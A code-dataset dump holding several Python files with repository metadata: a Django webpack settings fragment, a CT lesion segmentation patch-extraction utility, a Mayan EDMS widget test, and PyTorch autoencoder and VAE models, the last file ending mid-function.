# ------------------------------------------------------------------------------
INSTALLED_APPS += ('webpack_loader',)
# Webpack Local Stats file
STATS_FILE = ROOT_DIR('webpack-stats.json')
# Webpack config
WEBPACK_LOADER = {
'DEFAULT': {
'STATS_FILE': STATS_FILE
}
}
{% endif %}
# Your common stuff: Below this line define 3rd party library settings
| 37.128302
| 147
| 0.621913
|
64ad504a4f5339c8b2ea0c31fbf1a0fb2255c762
| 11,732
|
py
|
Python
|
utils/patch_ops.py
|
muschellij2/tbi_ct_lesion_segmentation
|
e3bc5af5eb8ed8bb2766afc00401f03978821d6f
|
[
"MIT"
] | null | null | null |
utils/patch_ops.py
|
muschellij2/tbi_ct_lesion_segmentation
|
e3bc5af5eb8ed8bb2766afc00401f03978821d6f
|
[
"MIT"
] | null | null | null |
utils/patch_ops.py
|
muschellij2/tbi_ct_lesion_segmentation
|
e3bc5af5eb8ed8bb2766afc00401f03978821d6f
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
import nibabel as nib
from sklearn.utils import shuffle
from tqdm import tqdm
from .pad import pad_image
import random
import copy
from time import strftime, time
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import sys
def PadImage(vol, padsize):
dim = vol.shape
padsize = np.asarray(padsize, dtype=int)
dim2 = dim+2*padsize
temp = np.zeros(dim2, dtype=float)
temp[padsize:dim[0]+padsize,
padsize:dim[1]+padsize,
padsize:dim[2]+padsize] = vol
return temp
def get_intersection(a, b):
'''
Gets intersection of coordinate arrays a and b returned from np.nonzero()-style functions.
Used to find valid centers for healthy patches.
TODO: CURRENTLY ONLY WORKS ON 3D ARRAYS
Params:
- a: tuple of N np.arrays, where N is the dimension of the original image
- b: tuple of N np.arrays, where N is the dimension of the original image
Returns:
- intersection: set of tuples of rank N, where N is the dimension of the original image
'''
# TODO: this is the slowest operation
start_time = time()
print(np.array(a).shape)
print(np.array(b).shape)
if len(a) == 3:
# first change format to be a list of coordinates rather than one list per dimension
a_reformat = [(x, y, z) for x, y, z in zip(a[0], a[1], a[2])]
b_reformat = [(x, y, z) for x, y, z in zip(b[0], b[1], b[2])]
elif len(a) == 2:
a_reformat = [(x, y) for x, y in zip(a[0], a[1])]
b_reformat = [(x, y) for x, y in zip(b[0], b[1])]
else: # TODO: proper error handling
print("Shape mismatch")
intersection = set(a_reformat) & set(b_reformat)
print("Time taken to calculate intersection:",
time() - start_time, "seconds")
return intersection
def get_center_coords(ct, mask, ratio):
'''
Gets coordinates for center pixel of all patches.
Params:
- ct: 3D ndarray, image data from which to find healthy coordinates
- mask: 3D ndarray, image data from which to find coordinates
- ratio: float in [0,1].
If 0 or 1, skip intersection calculation for speed
Returns:
- healthy_coords: set of tuples of rank 3, coordinates of healthy voxels
- lesion_coords: set of tuples of rank 3, coordinates of lesion voxels
'''
# These first two must be shuffled.
if ratio == 1:
# ct-valid patches
ct_possible_centers = np.nonzero(ct)
healthy_coords = [(x, y, z) for x, y, z in zip(ct_possible_centers[0],
ct_possible_centers[1],
ct_possible_centers[2])]
healthy_coords = set(shuffle(healthy_coords, random_state=0))
lesion_coords = {(0, 0, 0), (0, 0, 0), (0, 0, 0), }
elif ratio == 0:
healthy_coords = {(0, 0, 0), (0, 0, 0), (0, 0, 0), }
# mask lesion patches
lesion_coords = np.nonzero(mask)
# cuurently only works for 3D input images
lesion_coords = [(x, y, z) for x, y, z in zip(lesion_coords[0],
lesion_coords[1],
lesion_coords[2])]
lesion_coords = set(shuffle(lesion_coords, random_state=0))
else:
# ct-valid patches
ct_possible_centers = np.nonzero(ct)
zeros_coords = np.where(mask == 0)
healthy_coords = get_intersection(ct_possible_centers, zeros_coords)
# mask lesion patches
lesion_coords = np.nonzero(mask)
# currently only works for 3D input images
# This does not need to be shuffled since it will be shuffled later
lesion_coords = set([(x, y, z) for x, y, z in zip(lesion_coords[0],
lesion_coords[1],
lesion_coords[2])])
return healthy_coords, lesion_coords
def get_patches(invols, mask, patchsize, maxpatch, num_channels):
rng = random.SystemRandom()
mask = np.asarray(mask, dtype=np.float32)
patch_size = np.asarray(patchsize, dtype=int)
dsize = np.floor(patchsize/2).astype(dtype=int)
# find indices of all lesions in mask volume
mask_lesion_indices = np.nonzero(mask)
mask_lesion_indices = np.asarray(mask_lesion_indices, dtype=int)
total_lesion_patches = len(mask_lesion_indices[0])
num_patches = np.minimum(maxpatch, total_lesion_patches)
'''
print("Number of patches used: {} out of {} (max: {})"
.format(num_patches,
total_lesion_patches,
maxpatch))
'''
randidx = rng.sample(range(0, total_lesion_patches), num_patches)
# here, 3 corresponds to each axis of the 3D volume
shuffled_mask_lesion_indices = np.ndarray((3, num_patches))
for i in range(0, num_patches):
for j in range(0, 3):
shuffled_mask_lesion_indices[j,
i] = mask_lesion_indices[j, randidx[i]]
shuffled_mask_lesion_indices = np.asarray(
shuffled_mask_lesion_indices, dtype=int)
# mask out all lesion indices to get all healthy indices
tmp = copy.deepcopy(invols[0])
tmp[tmp > 0] = 1
tmp[tmp <= 0] = 0
tmp = np.multiply(tmp, 1-mask)
healthy_brain_indices = np.nonzero(tmp)
healthy_brain_indices = np.asarray(healthy_brain_indices, dtype=int)
num_healthy_indices = len(healthy_brain_indices[0])
randidx0 = rng.sample(range(0, num_healthy_indices), num_patches)
# here, 3 corresponds to each axis of the 3D volume
shuffled_healthy_brain_indices = np.ndarray((3, num_patches))
for i in range(0, num_patches):
for j in range(0, 3):
shuffled_healthy_brain_indices[j,
i] = healthy_brain_indices[j, randidx0[i]]
shuffled_healthy_brain_indices = np.asarray(
shuffled_healthy_brain_indices, dtype=int)
newidx = np.concatenate([shuffled_mask_lesion_indices,
shuffled_healthy_brain_indices], axis=1)
CT_matsize = (2*num_patches, patchsize[0], patchsize[1], num_channels)
Mask_matsize = (2*num_patches, patchsize[0], patchsize[1], 1)
CTPatches = np.ndarray(CT_matsize, dtype=np.float16)
MaskPatches = np.ndarray(Mask_matsize, dtype=np.float16)
for i in range(0, 2*num_patches):
I = newidx[0, i]
J = newidx[1, i]
K = newidx[2, i]
for c in range(num_channels):
'''
CTPatches[i, :, :, c] = invols[c][I - dsize[0]: I + dsize[0] + 1,
J - dsize[1]: J + dsize[1] + 1,
K]
'''
# trying even-sided patches
CTPatches[i, :, :, c] = invols[c][I - dsize[0]: I + dsize[0],
J - dsize[1]: J + dsize[1],
K]
'''
MaskPatches[i, :, :, 0] = mask[I - dsize[0]: I + dsize[0] + 1,
J - dsize[1]:J + dsize[1] + 1,
K]
'''
# trying even-sided patches
MaskPatches[i, :, :, 0] = mask[I - dsize[0]: I + dsize[0],
J - dsize[1]:J + dsize[1],
K]
CTPatches = np.asarray(CTPatches, dtype=np.float16)
MaskPatches = np.asarray(MaskPatches, dtype=np.float16)
return CTPatches, MaskPatches
def CreatePatchesForTraining(atlasdir, plane, patchsize, max_patch=150000, num_channels=1):
'''
Params:
- TODO
- healthy: bool, False if not going over the healthy dataset, true otherwise
'''
# get filenames
ct_names = os.listdir(atlasdir)
mask_names = os.listdir(atlasdir)
ct_names = [x for x in ct_names if "CT" in x]
mask_names = [x for x in mask_names if "mask" in x]
ct_names.sort()
mask_names.sort()
numatlas = len(ct_names)
patchsize = np.asarray(patchsize, dtype=int)
padsize = np.max(patchsize + 1)# / 2
# calculate total number of voxels for all images to pre-allocate array
f = 0
for i in range(0, numatlas):
maskname = mask_names[i]
maskname = os.path.join(atlasdir, maskname)
temp = nib.load(maskname)
mask = temp.get_data()
f = f + np.sum(mask)
print("Total number of lesion patches =", f)
total_num_patches = int(np.minimum(max_patch * numatlas, f))
single_subject_num_patches = total_num_patches // numatlas
print("Allowed total number of patches =", total_num_patches)
# note here we double the size of the tensors to allow for healthy patches too
doubled_num_patches = total_num_patches * 2
if plane == "axial":
CT_matsize = (doubled_num_patches,
patchsize[0], patchsize[1], num_channels)
Mask_matsize = (doubled_num_patches, patchsize[0], patchsize[1], 1)
elif plane == "sagittal":
CT_matsize = (doubled_num_patches,
patchsize[0], 16, num_channels)
Mask_matsize = (doubled_num_patches, patchsize[0], 16, 1)
elif plane == "coronal":
CT_matsize = (doubled_num_patches,
16, patchsize[1], num_channels)
Mask_matsize = (doubled_num_patches, 16, patchsize[1], 1)
CTPatches = np.zeros(CT_matsize, dtype=np.float16)
MaskPatches = np.zeros(Mask_matsize, dtype=np.float16)
indices = [x for x in range(doubled_num_patches)]
indices = shuffle(indices, random_state=0)
cur_idx = 0
# interpret plane
planar_codes = {"axial": (0, 1, 2),
"sagittal": (1, 2, 0),
"coronal": (2, 0, 1)}
planar_code = planar_codes[plane]
for i in tqdm(range(0, numatlas)):
ctname = ct_names[i]
ctname = os.path.join(atlasdir, ctname)
temp = nib.load(ctname)
ct = temp.get_data()
ct = np.asarray(ct, dtype=np.float16)
maskname = mask_names[i]
maskname = os.path.join(atlasdir, maskname)
temp = nib.load(maskname)
mask = temp.get_data()
mask = np.asarray(mask, dtype=np.float16)
# here, need to ensure that the CT and mask tensors
# are padded out to larger than the size of the requested
# patches, to allow for patches to be gathered from edges
ct = PadImage(ct, padsize)
mask = PadImage(mask, padsize)
ct = np.transpose(ct, axes=planar_code)
mask = np.transpose(mask, axes=planar_code)
invols = [ct] # can handle multichannel here
# adjusting patch size after transpose
if ct.shape[0] < ct.shape[1]:
patchsize = (ct.shape[0]//4, patchsize[1])
if ct.shape[1] < ct.shape[0]:
patchsize = (patchsize[0], ct.shape[1]//4)
patchsize = np.asarray(patchsize, dtype=int)
CTPatchesA, MaskPatchesA = get_patches(invols,
mask,
patchsize,
single_subject_num_patches,
num_channels,)
CTPatchesA = np.asarray(CTPatchesA, dtype=np.float16)
MaskPatchesA = np.asarray(MaskPatchesA, dtype=np.float16)
for ct_patch, mask_patch in zip(CTPatchesA, MaskPatchesA):
CTPatches[indices[cur_idx], :, :, :] = ct_patch
MaskPatches[indices[cur_idx], :, :, :] = mask_patch
cur_idx += 1
return (CTPatches, MaskPatches)
| 39.635135
| 95
| 0.58285
|
34aa8a2d07ded6dc43ebc75fcf00745161f11c66
| 625
|
py
|
Python
|
mayan/apps/documents/tests/test_widgets.py
|
CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons
|
0e4e919fd2e1ded6711354a0330135283e87f8c7
|
[
"Apache-2.0"
] | 2
|
2021-09-12T19:41:19.000Z
|
2021-09-12T19:41:20.000Z
|
mayan/apps/documents/tests/test_widgets.py
|
CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons
|
0e4e919fd2e1ded6711354a0330135283e87f8c7
|
[
"Apache-2.0"
] | 37
|
2021-09-13T01:00:12.000Z
|
2021-10-02T03:54:30.000Z
|
mayan/apps/documents/tests/test_widgets.py
|
CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons
|
0e4e919fd2e1ded6711354a0330135283e87f8c7
|
[
"Apache-2.0"
] | 1
|
2021-09-22T13:17:30.000Z
|
2021-09-22T13:17:30.000Z
|
from ..permissions import permission_document_view
from .base import GenericDocumentViewTestCase
from .mixins.document_mixins import DocumentViewTestMixin
class DocumentPreviewWidgetViewTestCase(
DocumentViewTestMixin, GenericDocumentViewTestCase
):
def test_document_preview_page_carousel_widget_render(self):
self.grant_access(
obj=self.test_document, permission=permission_document_view
)
response = self._request_test_document_preview_view()
self.assertContains(
response=response, status_code=200, text='carousel-container'
)
| 32.894737
| 74
| 0.7456
|
8b42b65931a12ee271904e43b8583056fc8b3e9f
| 22,096
|
py
|
Python
|
models/autoencoders.py
|
caotians1/OD-test-master
|
e272421294a3614bdcdb3a4e4b530f613dad1a1c
|
[
"MIT"
] | 3
|
2020-10-07T18:35:50.000Z
|
2021-02-23T06:36:21.000Z
|
models/autoencoders.py
|
caotians1/OD-test-master
|
e272421294a3614bdcdb3a4e4b530f613dad1a1c
|
[
"MIT"
] | null | null | null |
models/autoencoders.py
|
caotians1/OD-test-master
|
e272421294a3614bdcdb3a4e4b530f613dad1a1c
|
[
"MIT"
] | 3
|
2020-10-08T14:38:15.000Z
|
2021-11-08T11:51:48.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import math
"""
The VAE code is based on
https://github.com/pytorch/examples/blob/master/vae/main.py
The q(x|z)-decoder is a bernoulli distribution rather than a Gaussian.
"""
class ELU_BatchNorm2d(torch.nn.Module):
def __init__(self, filters):
super(ELU_BatchNorm2d, self).__init__()
self.bn = torch.nn.BatchNorm2d(filters)
def forward(self, x):
return self.bn(F.elu(x))
class ResidualBlock(torch.nn.Module):
def __init__(self, filters, kernel_size):
super(ResidualBlock, self).__init__()
self.ops = torch.nn.Sequential(*[
torch.nn.Conv2d(filters, filters, kernel_size=kernel_size, padding=(kernel_size - 1) // 2, bias=False),
ELU_BatchNorm2d(filters),
torch.nn.Conv2d(filters, filters, kernel_size=kernel_size, padding=(kernel_size - 1) // 2, bias=False),
torch.nn.BatchNorm2d(filters)
])
def forward(self, x):
return F.elu(x + self.ops(x))
class Residual_AE(nn.Module):
def __init__(self, dims, max_channels=1024, depth=7, n_hidden=1024):
assert len(dims) == 3, 'Please specify 3 values for dims'
super(Residual_AE, self).__init__()
kernel_size = 3
current_channels = 16
self.epoch_factor = max(1, n_hidden//256)
self.default_sigmoid = False
self.netid = 'max.%d.d.%d.nH.%d'%(max_channels, depth, n_hidden)
# encoder ###########################################
modules = []
spatial_sizes = [(dims[1], dims[2])]
modules.append(torch.nn.Conv2d(in_channels=dims[0], out_channels=current_channels, kernel_size=kernel_size, padding=(kernel_size-1)//2, bias=False))
modules.append(torch.nn.BatchNorm2d(current_channels))
modules.append(torch.nn.ELU())
for i in range(depth):
modules.append(ResidualBlock(current_channels, kernel_size))
next_channels = min(current_channels * 2, max_channels)
modules.append(torch.nn.Conv2d(current_channels, next_channels, kernel_size=3, stride=2, bias=False, padding=1))
current_channels = next_channels
modules.append(ELU_BatchNorm2d(current_channels))
spatial_sizes.append(( math.floor(((spatial_sizes[-1][0]-1)/2) + 1), math.floor(((spatial_sizes[-1][1]-1)/2) + 1) ))
# Bottleneck layer
modules.append(ELU_BatchNorm2d(current_channels))
modules.append(ResidualBlock(filters=current_channels, kernel_size=kernel_size))
self.encoder = nn.Sequential(*modules)
#
# # decoder ###########################################
modules = []
out_pads = self._calculate_out_pad(spatial_sizes)
for i in range(depth):
next_channels = current_channels//2
modules.append(torch.nn.ConvTranspose2d(current_channels, next_channels,
kernel_size=3, stride=2, bias=False, padding=1, output_padding=out_pads[i]))
current_channels = next_channels
modules.append(ELU_BatchNorm2d(current_channels))
modules.append(ResidualBlock(current_channels, kernel_size))
# Final layer
modules.append(nn.Conv2d(current_channels, dims[0], kernel_size=kernel_size, padding=(kernel_size-1)//2, bias=False))
self.decoder = nn.Sequential(*modules)
def _calculate_out_pad(self, spatial_sizes, stride=2, padding=1, kernel_size=3, d=1):
out_pad = []
for i in reversed(range(1, len(spatial_sizes))):
current = spatial_sizes[i]
next = spatial_sizes[i-1]
pad = [0, 0]
for j in range(len(current)):
outputsize = (current[j] - 1)*stride-2*padding + (kernel_size-1)*d + 1
if outputsize < next[j]:
pad[j] = 1
out_pad.append(pad)
return out_pad
def encode(self, x):
n_samples = x.size(0)
code = self.encoder(x)
out = code.view(n_samples, -1) # flatten to vectors.
return out
def forward(self, x, sigmoid=False):
enc = self.encoder(x)
dec = self.decoder(enc)
if sigmoid or self.default_sigmoid:
dec = F.sigmoid(dec)
return dec
def train_config(self):
config = {}
config['optim'] = optim.Adam(self.parameters(), lr=1e-3)
config['scheduler'] = optim.lr_scheduler.ReduceLROnPlateau(config['optim'], patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config['max_epoch'] = 240 * self.epoch_factor
return config
def preferred_name(self):
return self.__class__.__name__+"."+self.netid
class Generic_AE(nn.Module):
def __init__(self, dims, max_channels=512, depth=10, n_hidden=256):
assert len(dims) == 3, 'Please specify 3 values for dims'
super(Generic_AE, self).__init__()
kernel_size = 3
all_channels = []
current_channels = 64
nonLin = nn.ELU
self.epoch_factor = max(1, n_hidden//256)
self.default_sigmoid = False
max_pool_layers = [i%2==0 for i in range(depth)]
remainder_layers = []
self.netid = 'max.%d.d.%d.nH.%d'%(max_channels, depth, n_hidden)
# encoder ###########################################
modules = []
in_channels = dims[0]
in_spatial_size = dims[1]
for i in range(depth):
modules.append(nn.Conv2d(in_channels, current_channels, kernel_size=kernel_size, padding=(kernel_size-1)//2))
modules.append(nn.BatchNorm2d(current_channels))
modules.append(nonLin())
in_channels = current_channels
all_channels.append(current_channels)
if max_pool_layers[i]:
modules.append(nn.MaxPool2d(2))
current_channels = min(current_channels * 2, max_channels)
remainder_layers.append(in_spatial_size % 2)
in_spatial_size = math.floor(in_spatial_size/2)
# Final layer
modules.append(nn.Conv2d(in_channels, n_hidden, kernel_size=kernel_size, padding=(kernel_size-1)//2))
modules.append(nn.BatchNorm2d(n_hidden))
modules.append(nonLin())
self.encoder = nn.Sequential(*modules)
# decoder ###########################################
modules = []
in_channels = n_hidden
if self.__class__ == Generic_VAE:
in_channels = in_channels // 2
current_index = len(all_channels)-1
r_ind = len(remainder_layers)-1
for i in range(depth):
modules.append(nn.Conv2d(in_channels, all_channels[current_index], kernel_size=kernel_size, padding=(kernel_size-1)//2))
modules.append(nn.BatchNorm2d(all_channels[current_index]))
modules.append(nonLin())
if max_pool_layers[i]:
modules.append(nn.Upsample(scale_factor=2, mode='nearest'))
if remainder_layers[r_ind] > 0:
modules.append(nn.ZeroPad2d((1,0,1,0)))
r_ind -= 1
in_channels = all_channels[current_index]
current_index -= 1
# Final layer
modules.append(nn.Conv2d(in_channels, dims[0], kernel_size=kernel_size, padding=(kernel_size-1)//2))
self.decoder = nn.Sequential(*modules)
def encode(self, x):
n_samples = x.size(0)
code = self.encoder(x)
out = code.view(n_samples, -1) # flatten to vectors.
return out
def forward(self, x, sigmoid=False):
enc = self.encoder(x)
dec = self.decoder(enc)
if sigmoid or self.default_sigmoid:
dec = F.sigmoid(dec)
return dec
def train_config(self):
config = {}
config['optim'] = optim.Adam(self.parameters(), lr=1e-3)
config['scheduler'] = optim.lr_scheduler.ReduceLROnPlateau(config['optim'], patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config['max_epoch'] = 240 * self.epoch_factor
return config
def preferred_name(self):
return self.__class__.__name__+"."+self.netid
class Generic_VAE(Generic_AE):
def __init__(self, dims, max_channels=512, depth=10, n_hidden=256):
super(Generic_VAE, self).__init__(dims, max_channels, depth, 2*n_hidden)
self.fc_e_mu = nn.Linear(2*n_hidden, n_hidden)
self.fc_e_std = nn.Linear(2*n_hidden, n_hidden)
def reparameterize(self, mu, logvar):
if self.training:
std = torch.exp(0.5*logvar)
eps = torch.randn_like(std)
return eps.mul(std).add_(mu)
else:
return mu
def encode(self, x):
n_samples = x.size(0)
h_out = self.encoder(x)
code = self.fc_e_mu(h_out.view(n_samples, -1))
return code
def forward(self, x):
enc = self.encoder(x)
n_size = enc.size(0)
mu, logvar = self.fc_e_mu(enc.view(n_size, -1)), self.fc_e_std(enc.view(n_size, -1))
self.last_mu = mu
self.last_std = logvar
z = self.reparameterize(mu, logvar)
dec = self.decoder(z.view(n_size, enc.size(1)//2, enc.size(2), enc.size(3)))
dec = F.sigmoid(dec)
return dec
class ALILikeAE(nn.Module):
def __init__(self, dims, max_channels=1024, depth=6, n_hidden=512):
assert len(dims) == 3, 'Please specify 3 values for dims'
super(ALILikeAE, self).__init__()
EncKernel = [2, 7, 5, 7, 4, 1]
EncStride = [1, 2, 2, 2, 1, 1]
EncDepth = [64, 128, 256, 512, 512, n_hidden]
# Generator param
GenKernel = [4, 7, 5, 7, 2, 1]
GenStride = [1, 2, 2, 2, 1, 1]
GenDepth = [256, 128, 64, 32, 32, dims[0]]
self.epoch_factor = max(1, n_hidden//256)
self.default_sigmoid = False
remainder_layers = []
self.netid = 'max.%d.d.%d.nH.%d'%(max_channels, depth, n_hidden)
# encoder ###########################################
modules = []
in_channels = dims[0]
for i in range(depth):
modules.append(nn.Conv2d(in_channels, EncDepth[i], kernel_size=EncKernel[i], padding=0, stride=EncStride[i]))
modules.append(torch.nn.LeakyReLU(0.1, inplace=True))
modules.append(nn.BatchNorm2d(EncDepth[i]))
in_channels = EncDepth[i]
self.encoder = nn.Sequential(*modules)
self.fc_e_mu = nn.Linear(2 * n_hidden, n_hidden)
self.fc_e_std = nn.Linear(2 * n_hidden, n_hidden)
# decoder ###########################################
modules = []
in_channels = n_hidden
if self.__class__ == Generic_VAE:
in_channels = in_channels // 2
for i in range(depth):
modules.append(nn.ConvTranspose2d(in_channels, GenDepth[i], kernel_size=GenKernel[i], padding=0, stride=GenStride[i]))
modules.append(torch.nn.ReLU(True))
modules.append(nn.BatchNorm2d(GenDepth[i]))
in_channels = GenDepth[i]
# Final layer
self.decoder = nn.Sequential(*modules)
def encode(self, x):
n_samples = x.size(0)
code = self.encoder(x)
out = code.view(n_samples, -1) # flatten to vectors.
return out
def forward(self, x, sigmoid=False):
enc = self.encoder(x)
dec = self.decoder(enc)
if sigmoid or self.default_sigmoid:
dec = (F.tanh(dec) + 1) / 2. # It's actually TanhHHHHHH
return dec
def train_config(self):
config = {}
config['optim'] = optim.Adam(self.parameters(), lr=1e-3)
config['scheduler'] = optim.lr_scheduler.ReduceLROnPlateau(config['optim'], patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config['max_epoch'] = 240 * self.epoch_factor
return config
def preferred_name(self):
return self.__class__.__name__+"."+self.netid
class ALILikeVAE(nn.Module):
def __init__(self, dims, max_channels=1024, depth=6, n_hidden=512):
assert len(dims) == 3, 'Please specify 3 values for dims'
super(ALILikeVAE, self).__init__()
EncKernel = [2, 7, 5, 7, 4]
EncStride = [1, 2, 2, 2, 1]
EncDepth = [64, 128, 256, 512, 512]
# Generator param
GenKernel = [4, 7, 5, 7, 2, 1]
GenStride = [1, 2, 2, 2, 1, 1]
GenDepth = [256, 128, 64, 32, 32, dims[0]]
self.epoch_factor = max(1, n_hidden//256)
self.default_sigmoid = False
remainder_layers = []
self.netid = 'max.%d.d.%d.nH.%d'%(max_channels, depth, n_hidden)
# encoder ###########################################
modules = []
in_channels = dims[0]
for i in range(depth-1):
modules.append(nn.Conv2d(in_channels, EncDepth[i], kernel_size=EncKernel[i], padding=0, stride=EncStride[i]))
modules.append(torch.nn.LeakyReLU(0.1, inplace=True))
modules.append(nn.BatchNorm2d(EncDepth[i]))
in_channels = EncDepth[i]
self.fc_e_mu = nn.Linear(in_channels, n_hidden)
self.fc_e_std = nn.Linear(in_channels, n_hidden)
self.encoder = nn.Sequential(*modules)
# decoder ###########################################
modules = []
in_channels = n_hidden
if self.__class__ == Generic_VAE:
in_channels = in_channels // 2
for i in range(depth):
modules.append(nn.ConvTranspose2d(in_channels, GenDepth[i], kernel_size=GenKernel[i], padding=0, stride=GenStride[i]))
modules.append(torch.nn.ReLU(True))
modules.append(nn.BatchNorm2d(GenDepth[i]))
in_channels = GenDepth[i]
# Final layer
self.decoder = nn.Sequential(*modules)
def reparameterize(self, mu, logvar):
if self.training:
std = torch.exp(0.5*logvar)
eps = torch.randn_like(std)
return eps.mul(std).add_(mu)
else:
return mu
def encode(self, x):
n_samples = x.size(0)
h_out = self.encoder(x)
code = self.fc_e_mu(h_out.view(n_samples, -1))
return code
def forward(self, x):
enc = self.encoder(x)
n_size = enc.size(0)
mu, logvar = self.fc_e_mu(enc.view(n_size, -1)), self.fc_e_std(enc.view(n_size, -1))
self.last_mu = mu
self.last_std = logvar
z = self.reparameterize(mu, logvar)
dec = self.decoder(z.view(n_size, -1, enc.size(2), enc.size(3)))
dec = (F.tanh(dec) + 1.0)/ 2.0
return dec
def train_config(self):
config = {}
config['optim'] = optim.Adam(self.parameters(), lr=1e-3)
config['scheduler'] = optim.lr_scheduler.ReduceLROnPlateau(config['optim'], patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config['max_epoch'] = 240 * self.epoch_factor
return config
def preferred_name(self):
return self.__class__.__name__+"."+self.netid
class ALILikeResAE(nn.Module):
def __init__(self, dims, max_channels=1024, depth=6, n_hidden=512):
assert len(dims) == 3, 'Please specify 3 values for dims'
super(ALILikeResAE, self).__init__()
EncKernel = [2, 7, 5, 7, 4, 1]
EncStride = [1, 2, 2, 2, 1, 1]
EncDepth = [64, 128, 256, 512, 512, n_hidden]
# Generator param
GenKernel = [4, 7, 5, 7, 2, 1]
GenStride = [1, 2, 2, 2, 1, 1]
GenDepth = [256, 128, 64, 32, 32, dims[0]]
self.epoch_factor = max(1, n_hidden//256)
self.default_sigmoid = False
remainder_layers = []
self.netid = 'max.%d.d.%d.nH.%d'%(max_channels, depth, n_hidden)
# encoder ###########################################
modules = []
in_channels = dims[0]
for i in range(depth):
modules.append(nn.Conv2d(in_channels, EncDepth[i], kernel_size=EncKernel[i], padding=0, stride=EncStride[i]))
modules.append(torch.nn.LeakyReLU(0.1, inplace=True))
modules.append(nn.BatchNorm2d(EncDepth[i]))
modules.append(ResidualBlock(EncDepth[i], 3))
modules.append(ELU_BatchNorm2d(EncDepth[i]))
in_channels = EncDepth[i]
self.encoder = nn.Sequential(*modules)
self.fc_e_mu = nn.Linear(2 * n_hidden, n_hidden)
self.fc_e_std = nn.Linear(2 * n_hidden, n_hidden)
# decoder ###########################################
modules = []
in_channels = n_hidden
if self.__class__ == Generic_VAE:
in_channels = in_channels // 2
for i in range(depth):
modules.append(nn.ConvTranspose2d(in_channels, GenDepth[i], kernel_size=GenKernel[i], padding=0, stride=GenStride[i]))
modules.append(torch.nn.ReLU(True))
modules.append(nn.BatchNorm2d(GenDepth[i]))
modules.append(ResidualBlock(GenDepth[i], 3))
modules.append(ELU_BatchNorm2d(GenDepth[i]))
in_channels = GenDepth[i]
# Final layer
self.decoder = nn.Sequential(*modules)
def encode(self, x):
n_samples = x.size(0)
code = self.encoder(x)
out = code.view(n_samples, -1) # flatten to vectors.
return out
def forward(self, x, sigmoid=False):
enc = self.encoder(x)
dec = self.decoder(enc)
if sigmoid or self.default_sigmoid:
dec = (F.tanh(dec) + 1) / 2. # It's actually TanhHHHHHH
return dec
def train_config(self):
config = {}
config['optim'] = optim.Adam(self.parameters(), lr=1e-3)
config['scheduler'] = optim.lr_scheduler.ReduceLROnPlateau(config['optim'], patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config['max_epoch'] = 240 * self.epoch_factor
return config
def preferred_name(self):
return self.__class__.__name__+"."+self.netid
class ALILikeResVAE(nn.Module):
def __init__(self, dims, max_channels=1024, depth=6, n_hidden=512):
assert len(dims) == 3, 'Please specify 3 values for dims'
super(ALILikeResVAE, self).__init__()
EncKernel = [2, 7, 5, 7, 4]
EncStride = [1, 2, 2, 2, 1]
EncDepth = [64, 128, 256, 512, 512]
# Generator param
GenKernel = [4, 7, 5, 7, 2, 1]
GenStride = [1, 2, 2, 2, 1, 1]
GenDepth = [256, 128, 64, 32, 32, dims[0]]
self.epoch_factor = max(1, n_hidden//256)
self.default_sigmoid = False
remainder_layers = []
self.netid = 'max.%d.d.%d.nH.%d'%(max_channels, depth, n_hidden)
# encoder ###########################################
modules = []
in_channels = dims[0]
for i in range(depth-1):
modules.append(nn.Conv2d(in_channels, EncDepth[i], kernel_size=EncKernel[i], padding=0, stride=EncStride[i]))
modules.append(torch.nn.LeakyReLU(0.1, inplace=True))
modules.append(nn.BatchNorm2d(EncDepth[i]))
modules.append(ResidualBlock(EncDepth[i], 3))
modules.append(ELU_BatchNorm2d(EncDepth[i]))
in_channels = EncDepth[i]
self.fc_e_mu = nn.Linear(in_channels, n_hidden)
self.fc_e_std = nn.Linear(in_channels, n_hidden)
self.encoder = nn.Sequential(*modules)
# decoder ###########################################
modules = []
in_channels = n_hidden
if self.__class__ == Generic_VAE:
in_channels = in_channels // 2
for i in range(depth):
modules.append(nn.ConvTranspose2d(in_channels, GenDepth[i], kernel_size=GenKernel[i], padding=0, stride=GenStride[i]))
modules.append(torch.nn.ReLU(True))
modules.append(nn.BatchNorm2d(GenDepth[i]))
modules.append(ResidualBlock(GenDepth[i], 3))
modules.append(ELU_BatchNorm2d(GenDepth[i]))
in_channels = GenDepth[i]
# Final layer
self.decoder = nn.Sequential(*modules)
def reparameterize(self, mu, logvar):
if self.training:
std = torch.exp(0.5*logvar)
eps = torch.randn_like(std)
return eps.mul(std).add_(mu)
else:
return mu
def encode(self, x):
n_samples = x.size(0)
h_out = self.encoder(x)
code = self.fc_e_mu(h_out.view(n_samples, -1))
return code
def forward(self, x):
enc = self.encoder(x)
n_size = enc.size(0)
mu, logvar = self.fc_e_mu(enc.view(n_size, -1)), self.fc_e_std(enc.view(n_size, -1))
self.last_mu = mu
self.last_std = logvar
z = self.reparameterize(mu, logvar)
dec = self.decoder(z.view(n_size, -1, enc.size(2), enc.size(3)))
dec = (F.tanh(dec) + 1.0)/ 2.0
return dec
def train_config(self):
config = {}
config['optim'] = optim.Adam(self.parameters(), lr=1e-3)
config['scheduler'] = optim.lr_scheduler.ReduceLROnPlateau(config['optim'], patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config['max_epoch'] = 240 * self.epoch_factor
return config
def preferred_name(self):
return self.__class__.__name__+"."+self.netid
class VAE_Loss(nn.Module):
def __init__(self, VAE_model, BCE):
super(VAE_Loss, self).__init__()
#assert VAE_model.__class__ == Generic_VAE, 'Only Generic_VAEs are accepted.'
self.VAE = VAE_model
self.size_average = True
self.reduction = 'sum'
if BCE:
self.loss = nn.BCELoss(size_average=False)
else:
self.loss = nn.MSELoss(size_average=False)
def forward(self, X, Y):
BCE_loss = self.loss(X, Y)
mu, logvar = self.VAE.last_mu, self.VAE.last_std
KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())
